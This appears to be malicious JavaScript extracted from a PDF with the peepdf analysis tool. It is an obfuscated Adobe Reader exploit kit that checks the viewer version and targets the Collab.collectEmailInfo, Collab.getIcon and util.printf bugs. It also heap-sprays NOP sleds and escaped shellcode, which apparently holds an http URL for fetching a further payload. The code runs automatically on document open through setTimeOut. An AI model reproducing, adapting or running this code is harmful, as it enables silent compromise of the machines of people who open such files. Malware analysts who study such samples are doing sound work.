// peepdf comment: Javascript code located in object 7 (version 0)

var xyutequex = false;
var wochechuc = new Array();

function hethithyq() {}
function wexyixyat() {}
var thexye;

function cazethexy(cazethexy) {
    return true;
}
this.pecuwo = 24560;

function kazuq(mochyb, fabaquochu) {
    function thith(thith) {
        return thith;
    }
    while (mochyb.length * 2 < fabaquochu) mochyb += mochyb;
    this.quynopaque = 'quynopaque';
    mochyb = mochyb.substring(0, fabaquochu / 2);

    function natoj(natoj) {
        return natoj;
    }
    return mochyb;
}
this.laxyeth = false;

function tychux(gabuz) {
    var nithochyp = false;
    var xyicedax = 0x0c0c0c0c;
    var queth = false;
    var cotuchuvuq = false;
    var xyymichan = new Array('%u4343%', 'u4343%u', '4343%u0F', 'EB%u335B', '%u66C9', '%u80B9%', 'u8001', '%uEF33%', 'uE243%u', 'EBFA%', 'uE805%u', 'FFEC%uF', 'FFF%u', '8B7F%', 'uDF4E%', 'uEFEF%u', '64EF%uE3', 'AF%u9F64', '%u42F3%', 'u9F64%u6', 'EE7%uE', 'F03%uEFE', 'B%u64', 'EF%uB', '903%u61', '87%uE1A1', '%u0703%u', 'EF11%u', 'EFEF%uAA', '66%uB9E', 'B%u7787%', 'u6511%', 'u07E1%uE', 'F1F%uE', 'FEF%uAA6', '6%uB9', 'E7%uC', 'A87%u', '105F%u', '072D%u', 'EF0D%uE', 'FEF%u', 'AA66%', 'uB9E3%u', '0087%u0F', '21%u078F', '%uEF3B%u', 'EFEF%u', 'AA66%uB9', 'FF%u2E', '87%u0A96', '%u0757%', 'uEF29%uE', 'FEF%uA', 'A66%uAFF', 'B%uD76F%', 'u9A2C%u', '6615%', 'uF7AA%', 'uE806%uE', 'FEE%uB', '1EF%u9A', '66%u6', '4CB%u', 'EBAA%u', 'EE85%u', '64B6%uF', '7BA%u07', 'B9%uEF', '64%uEFE', 'F%u87B', 'F%uF5', 'D9%u9FC', '0%u780', '7%uEF', 'EF%u6', '6EF%uF', '3AA%u2', 'A64%u', '2F6C%u', '66BF%uC', 'FAA%u', '1087%u', 'EFEF%uBF', 'EF%uAA6', '4%u85', 'FB%uB6ED', '%uBA64%u', '07F7%uE', 'F8E%uEFE', 'F%uAAEC', '%u28CF%u', 'B3EF%', 'uC191%u', '288A%uE', 'BAF%u8', 'A97%uEFE', 'F%u9A10%', 'u64CF', '%uE3AA%', 'uEE85%u', '64B6%', 'uF7BA%u', 'AF07%', 'uEFEF%u8', '5EF%uB7', 'E8%uAAEC', '%uDCCB%', 'uBC34%u', '10BC%uCF', '9A%uBC', 'BF%uAA', '64%u8', '5F3%u', 'B6EA%u', 'BA64%u0', '7F7%uE', 'FCC%uEF', 'EF%uEF', '85%u9A10', '%u64CF%', 'uE7AA%uE', 'D85%u6', '4B6%u', 'F7BA%u', 'FF07%uE', 'FEF%u85', 'EF%u64', '10%uF', 'FAA%uEE8', '5%u64', 'B6%uF', '7BA%uEF0', '7%uEFEF%', 'uAEEF', '%uBDB4', '%u0EEC%', 'u0EEC%u', '0EEC%', 'u0EEC%', 'u036C%uB', '5EB%u64', 'BC%u0D', '35%uBD1', '8%u0F10%', 'u64BA%u', '6403%uE7', '92%uB26', '4%uB9E3%', 'u9C64%u', '64D3%uF', '19B%uEC', '97%uB', '91C%u', '9964%uE', 'CCF%uD', 'C1C%uA62', '6%u42AE', '%u2CE', 'C%uDCB9', '%uE01', '9%uFF51', '%u1DD5%', 'uE79B%', 'u212E%uE', 'CE2%u', 'AF1D%u1', 'E04%u11D', '4%u9AB1', '%uB50A%u', '0464%uB', '564%uEC', 'CB%u893', '2%uE364%', 'u64A4%u', 'F3B5%u3', '2EC%uEB', '64%uEC64', '%uB12A%', 'u2DB2', '%uEFE', '7%u1B07', '%u101', '1%uBA10', '%uA3BD%u', 'A0A2%', 'uEFA1%', 'u7468', '%u707', '4%u2F3A', '%u772F', '%u7777', '%u652E%u', '6176%u67', '6E%u6C65', '%u7369%u', '6863%u69', '2D%u2D6', 'E%u617', '2%u6874%', 'u642E%', 'u2F65%u6', '16C%u64', '6E%u6E', '69%u2F6', '7%u78', '65%u2E', '65%u687', '0%u3F7', '0%u3D78%', 'u6470%', 'u0066');

    function kychojop(kychojop) {
        return true;
    }
    xyythoch = xyymichan.join("");
    var quachytho = 9814;
    var thicho = 'thicho';
    var quafynuquo = eval("un" + "es" + "ca" + "pe" + "")(xyythoch);

    function cytichich(cytichich) {
        return cytichich;
    }
    var xyewud = 13398;
    if (gabuz == 1) {
        this.choxye = false;
        xyicedax = 0x30303030;

        function pedip(pedip) {
            return true;
        }
        quafynuquo = eval("un" + "es" + "ca" + "pe" + "")(xyythoch);
        this.chevyfemaq = "chevyfemaq";
    } else if (gabuz == 2) {
        var xyajy = 'xyajy';
        quafynuquo = eval("une" + "sca" + "pe" + "")(xyythoch);

        function xyisupody(xyisupody) {
            return true;
        }
    }
    var cyquelejaq = false;

    function thochy() {}
    this.jogixyu = 1171;
    var quovequiva = 0x400000;
    var parethece = false;
    var rycofychum = quafynuquo.length * 2;
    this.xyycha = false;
    var fabaquochu = quovequiva - (rycofychum + 0x38);
    this.fucaquich = 'fucaquich';
    var mochyb = eval("une" + "sca" + "pe" + "")("%u909" + "0%u90" + "90" + "");

    function wecaxya(wecaxya) {
        return true;
    }
    mochyb = kazuq(mochyb, fabaquochu);

    function chequoc() {}
    var bijuja = (xyicedax - 0x400000) / quovequiva;
    this.thyque = 'thyque';
    for (var zeduxy = 0; zeduxy < bijuja; zeduxy++) wochechuc[zeduxy] = mochyb + quafynuquo;

    function quesuz(quesuz) {
        return true;
    }
}
function xyejywed() {
    var xyixyuquac = 'xyixyuquac';
    var micachy = 0;
    this.chuthoc = "chuthoc";
    var kaxyucochi = app.viewerVersion.toString();

    function quothete(quothete) {
        return true;
    }
    app.clearTimeOut(thexye);
    this.chahach = "chahach";
    if ((kaxyucochi >= 8 && kaxyucochi < 8.102) || kaxyucochi < 7.1) {
        this.quakaxyi = false;
        tychux(0);

        function xyuchonyq(xyuchonyq) {
            return true;
        }
        var requochos = unescape("%u" + "0c" + "0c" + "%u" + "0c" + "0c" + "");
        var xyimy = 21631;
        while (requochos.length < 0xaf98) requochos += requochos;
        var xyeth = false;
        eval("this")["co" + "ll" + "ab" + "St" + "or" + "e" + ""] = eval("Col" + "lab" + "")["co" + "ll" + "ec" + "tE" + "ma" + "il" + "In" + "fo" + ""]({
            subj: "dilyxyyqu",
            msg: requochos
        });
        var jequed = 'jequed';
    }
    if ((kaxyucochi >= 8.102 && kaxyucochi < 8.104) || (kaxyucochi >= 9 && kaxyucochi < 9.1) || kaxyucochi <= 7.101) {
        try {
            if (app["do" + "c" + ""]["Co" + "ll" + "ab" + ""]["get" + "Ico" + "n" + ""]) {
                function dachi(dachi) {
                    return dachi;
                }
                tychux(2);
                this.thexyi = "thexyi";
                var dumizec = eval("un" + "es" + "ca" + "pe" + "")("%09");
                var masyxyuch = 'masyxyuch';
                this.xyychy = 'xyychy';
                while (dumizec.length < 0x4000) dumizec += dumizec;
                this.xyyxyas = 11155;
                dumizec = "N." + dumizec;

                function chiquuchib(chiquuchib) {
                    return true;
                }
                eval("ap" + "p" + "")["do" + "c" + ""]["Co" + "ll" + "ab" + ""]["ge" + "tI" + "co" + "n" + ""](dumizec);
                var thada = 'thada';
                micachy = 1;

                function xyuchocho(xyuchocho) {
                    return true;
                }
            } else micachy = 1;
        } catch (e) {
            micachy = 1;
        }
        if (micachy == 1) {
            if (kaxyucochi == 8.102 || kaxyucochi == 7.1) {
                tychux(1);
                this.dykexy = 15280;
                var tyxyecechi = 12954;
                eval("ut" + "il" + "")["pri" + "ntf" + ""]("%4" + "50" + "00" + "f" + "", "1299999999999999" + "9999888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "88888888" + "");
            }
        }
    }
}
app.chiny = xyejywed;

function noquifyqu(noquifyqu) {
    return noquifyqu;
}
thexye = app.setTimeOut("app.chiny()", 10);

